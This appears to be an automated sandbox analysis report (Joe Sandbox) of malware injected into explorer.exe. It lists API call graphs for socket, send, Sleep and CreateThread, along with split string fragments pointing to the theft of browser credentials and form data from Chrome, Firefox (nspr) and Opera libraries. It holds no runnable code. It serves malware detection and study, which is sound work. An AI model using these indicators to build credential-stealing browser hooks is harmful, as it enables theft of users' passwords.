                                                                                                  • Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: send
                                                                                                  • String ID: send
                                                                                                  • API String ID: 2809346765-2809346765
                                                                                                  • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                  • Instruction ID: 47e1637fd2d202900940ecd35b2cdf28e827dc32e91388b51562b42e8fabb5f6
                                                                                                  • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                  • Instruction Fuzzy Hash: 55011270518A588FDB84DF1CE049B1577E0EB58314F5646AED85DCB266CA70D8818B81
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 416 10e265b2-10e265ea 417 10e2660a-10e2662b socket 416->417 418 10e265ec-10e26604 call 10e29942 416->418 418->417
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: socket
                                                                                                  • String ID: sock
                                                                                                  • API String ID: 98920635-2415254727
                                                                                                  • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                  • Instruction ID: 4384cb91d3c059cda389251b8ef505c4d375fe0a304bbc8076853a95ba11024e
                                                                                                  • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                  • Instruction Fuzzy Hash: 61014F70618A5C8FCB84EF1CE048B54BBE0FB59354F1545AEE85ECB266C7B0C981CB86
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 421 10e1e2dd-10e1e320 call 10e29942 424 10e1e326 421->424 425 10e1e3fa-10e1e40e 421->425 426 10e1e328-10e1e339 SleepEx 424->426 426->426 427 10e1e33b-10e1e341 426->427 428 10e1e343-10e1e349 427->428 429 10e1e34b-10e1e352 427->429 428->429 430 10e1e35c-10e1e36a call 10e28f12 428->430 431 10e1e370-10e1e376 429->431 432 10e1e354-10e1e35a 429->432 430->431 434 10e1e3b7-10e1e3bd 431->434 435 10e1e378-10e1e37e 431->435 432->430 432->431 438 10e1e3d4-10e1e3db 434->438 439 10e1e3bf-10e1e3cf call 10e1ee72 434->439 435->434 437 10e1e380-10e1e38a 435->437 437->434 442 10e1e38c-10e1e3b1 call 10e1f432 437->442 438->426 441 10e1e3e1-10e1e3f5 call 10e1e0f2 438->441 439->438 441->426 442->434
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 3472027048-0
                                                                                                  • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                  • Instruction ID: bf5e0552c62083204fdd18cea4d02c124fa1eb7d44bbcc38d8b677e4056af45e
                                                                                                  • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                  • Instruction Fuzzy Hash: 8D316A74A04B49DBDB58DF2A8088295F7A1FB54304F44467EE96DCB206CB70A890CF91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 457 10e1e412-10e1e446 call 10e29942 460 10e1e473-10e1e47d 457->460 461 10e1e448-10e1e472 call 10e2bc9e CreateThread 457->461
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2422867632-0
                                                                                                  • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                  • Instruction ID: d62dbfa4386cd459fe4f698f359ecbdd08ec7cb885b0ed93e252e45e76ed3f41
                                                                                                  • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                  • Instruction Fuzzy Hash: 29F0F634668E494FDB88EF2CD44663AF3D0FBE8214F41063EA54DC7264DE39D5814756
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                  • API String ID: 0-393284711
                                                                                                  • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                  • Instruction ID: 78dce04337d359188076389bad55b8f7eaba4b240ed33a9c96867fa4c4233e9b
                                                                                                  • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                  • Instruction Fuzzy Hash: BAE15974618B488FCBA5DF68C5857ABB7E0FB58300F504A2EA59FC7245DF30A541CB8A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                  • API String ID: 0-2916316912
                                                                                                  • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                  • Instruction ID: 60ecda5a1f38b88a42c65d04235855a4e112f496b4591a6aa3cae6e1d949664a
                                                                                                  • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                  • Instruction Fuzzy Hash: E1B18A70518B488FDB55EF68C486AEEB7F1FF98300F50461EE49AC7251EF70A4158B86
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                  • API String ID: 0-1539916866
                                                                                                  • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                  • Instruction ID: b29a5373d55bb65382cfd5801e404a3a44993b6d4f287ab6fb44721b8acfd291
                                                                                                  • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                  • Instruction Fuzzy Hash: E441B370A18B18CFDB14DF88A4467ADBBE2FB88740F00025EE809D7245DBB5DD958BD6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                  • API String ID: 0-355182820
                                                                                                  • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                  • Instruction ID: 39a8e6eff5d2bbacc9379a3cbc2a26de6c4bc7d787faf28cb636ae9b81395528
                                                                                                  • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                  • Instruction Fuzzy Hash: 0DC14A75218B099BC758EF24C486BEAF3E5FB94304F50472AA49AC7250DF70F625CB86
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                  • API String ID: 0-97273177
                                                                                                  • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                  • Instruction ID: 3328eddb0c5f26e5a757f1f8ded51eede87b18e6b86bfceb033112be7ac2af7d
                                                                                                  • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                  • Instruction Fuzzy Hash: AF51D5305187488FD709DF18D9817AAB7E5FBC5700F501A2EE8CBC7242DBB4A956CB82
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                  • API String ID: 0-639201278
                                                                                                  • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                  • Instruction ID: 0d86212690a14ab089913100eeba5e73b653a7d2913cc140c978657c7860e440
                                                                                                  • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                  • Instruction Fuzzy Hash: 6FC1B274618A194FC798EF28D55ABAAB3E1FB98300F514329A44EC7254DF30FA12CBC5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                  • API String ID: 0-639201278
                                                                                                  • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                  • Instruction ID: 2d2d9bb62976ebca2ac5fbc41f585aa0bc94ad4787752e453f86156cb6c2060b
                                                                                                  • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                  • Instruction Fuzzy Hash: F7C1B174618A194FC798EF28D55ABAAB3E1FB98300F51432DA44EC7254DF30FA12CB85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: UR$2$L: $Pass$User$name$word
                                                                                                  • API String ID: 0-2058692283
                                                                                                  • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                  • Instruction ID: 638420454f950c8333d465b05a6a849f6a6f52065eb2c4f78dbd8911c1ddd388
                                                                                                  • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                  • Instruction Fuzzy Hash: 92A1CD706187488BDB18DFA8D445BEEB7E1FF88300F40862DE48AD7242EF7099558B89
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: UR$2$L: $Pass$User$name$word
                                                                                                  • API String ID: 0-2058692283
                                                                                                  • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                  • Instruction ID: 443e9a6ff27eace3084445668b35eb223b4f066e39f577c8471c7bc8c6b0d060
                                                                                                  • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                  • Instruction Fuzzy Hash: B091AF706187488BDB18DFA8D545BEEB7E1FF88300F40862EE48AD7242EF709555CB89
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $.$e$n$v
                                                                                                  • API String ID: 0-1849617553
                                                                                                  • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                  • Instruction ID: 7289b9ff417d8b5496241d7a0b284cdf3ce3d8011f20acadf9816844e0e9dd1f
                                                                                                  • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                  • Instruction Fuzzy Hash: FE71B131618B498FD758EFA8C4857AAB7F4FF98304F00062EE44AC7261EF70E9558B81
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                  • API String ID: 0-1970020201
                                                                                                  • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                  • Instruction ID: ecbcf98409761686584466ea338c097cda62017b26498e2568099d0c770682c5
                                                                                                  • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                  • Instruction Fuzzy Hash: 82514CB4918B4C8BDB54DFA4C045BEEB7F1FF58300F40462EA49AE7214EF30A5558B89
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4$\$dll$ion.$vers
                                                                                                  • API String ID: 0-1610437797
                                                                                                  • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                  • Instruction ID: 7b0a7b50e061b1785a449b13081e4014d593e3ce1e08c5b9bab276b7021292fe
                                                                                                  • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                  • Instruction Fuzzy Hash: 88416434618B898FCBA5EF2499457EB73E4FB94301F51472E988EC7240DF30D6558B82
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 32.d$cli.$dll$sspi$user
                                                                                                  • API String ID: 0-327345718
                                                                                                  • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                  • Instruction ID: b0cf70992e28bd68f1fd936283aa385252386a6ddb6e94f3dc2a0898f4e7af67
                                                                                                  • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                  • Instruction Fuzzy Hash: 55418070A18E1D8FCB84EF68C1957AD73E6FB58340F91036AE80ED7210DA71D9908BC6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .dll$el32$h$kern
                                                                                                  • API String ID: 0-4264704552
                                                                                                  • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                  • Instruction ID: e83ba60c966e59c689b91983bed4a90623c34437e7cdd1f6cd5a531401e1934d
                                                                                                  • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                  • Instruction Fuzzy Hash: F24182B0608B494FD7A9DF28C0843AAB7E1FB98344F604B2E949EC3255DB70D955CB41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $Snif$f fr$om:
                                                                                                  • API String ID: 0-3434893486
                                                                                                  • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                  • Instruction ID: e9250999e7c9b4a47d5040d08af511832755855fa04d67f12e09946365b9de18
                                                                                                  • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                  • Instruction Fuzzy Hash: BB31DE74508B886FC75ADB28C485BDAB7D4FB84300F504A1EE49BC7292EE31A54ACA43
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $Snif$f fr$om:
                                                                                                  • API String ID: 0-3434893486
                                                                                                  • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                  • Instruction ID: 2f23a00e08a57fa335474d7e34c91145c5b6fcc63b12558fd2927574de1042b4
                                                                                                  • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                  • Instruction Fuzzy Hash: 8131EE75508B486FD75ADB28C485BEAB7D4FB94300F504A1EE49BC3296EE30A54ACE43
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .dll$chro$hild$me_c
                                                                                                  • API String ID: 0-3136806129
                                                                                                  • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                  • Instruction ID: e30a0f1efdd030105bb30795d1f6cea4760eed34c2dc772135d67eca5150039f
                                                                                                  • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                  • Instruction Fuzzy Hash: 59318D34218B484FC784EF288595BAAB7E1FBD8300F90066EA84ECB214DF30E9158B52
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .dll$chro$hild$me_c
                                                                                                  • API String ID: 0-3136806129
                                                                                                  • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                  • Instruction ID: 3ae146240e759b12eea1e333016d58f0ad8027c88b5c1e6d241e8fb84b395615
                                                                                                  • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                  • Instruction Fuzzy Hash: DB319C30218B484FC784DF288595BAAB7E1FFD8300F90072DA84ECB254DF30E9158B52
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                  • API String ID: 0-319646191
                                                                                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                  • Instruction ID: 2a8084a3190422bd4a7f683f6cb600330d8111f922d3dfb4eb9b9d75984ee228
                                                                                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                  • Instruction Fuzzy Hash: 3631DF31614A0D8BCB44EFA8C885BEEB7E4FB58214F40422AE44ED7240DE789645CB8A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                  • API String ID: 0-319646191
                                                                                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                  • Instruction ID: e995039d232cb10c79ac66528009193b8809ed2844d3549434a9cc5cde42c407
                                                                                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                  • Instruction Fuzzy Hash: 2221E470A10A4D8BCF45EFA8C985BEDBBE4FF58204F40432AE45AD7240DF749615CB8A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .$l$l$t
                                                                                                  • API String ID: 0-168566397
                                                                                                  • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                  • Instruction ID: 70387f20063abb8d498f92aabcc2d7ab43ec885a7fda0166506714511442e8e8
                                                                                                  • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                  • Instruction Fuzzy Hash: 89216D74A24A4D9BDB48EFA8D445BEDBBF1FB58314F50462EE009D3600DB74A5618B84
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .$l$l$t
                                                                                                  • API String ID: 0-168566397
                                                                                                  • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                  • Instruction ID: 6e408d94ca3e3e0c3d5fefd8c96e3a5a7f03d9319f5b9ffff22664ac3a7897b9
                                                                                                  • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                  • Instruction Fuzzy Hash: D3215E74A14A4D9FDB44EFA8D045BEDBAF1FB58314F50462EE009D3610DB74A5518B84
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10260000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: auth$logi$pass$user
                                                                                                  • API String ID: 0-2393853802
                                                                                                  • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                  • Instruction ID: 54570a126a34d14dfd2bb04bc7ffe3437b4a2ce4b3e6102219ded553380f3ce7
                                                                                                  • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                  • Instruction Fuzzy Hash: 1B21CD30614B0D8BCB45CF9D98817DEB7E1EF88384F00461AE80AEB244D7B0E924CBC6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:1.7%
                                                                                                  Dynamic/Decrypted Code Coverage:2%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:597
                                                                                                  Total number of Limit Nodes:82
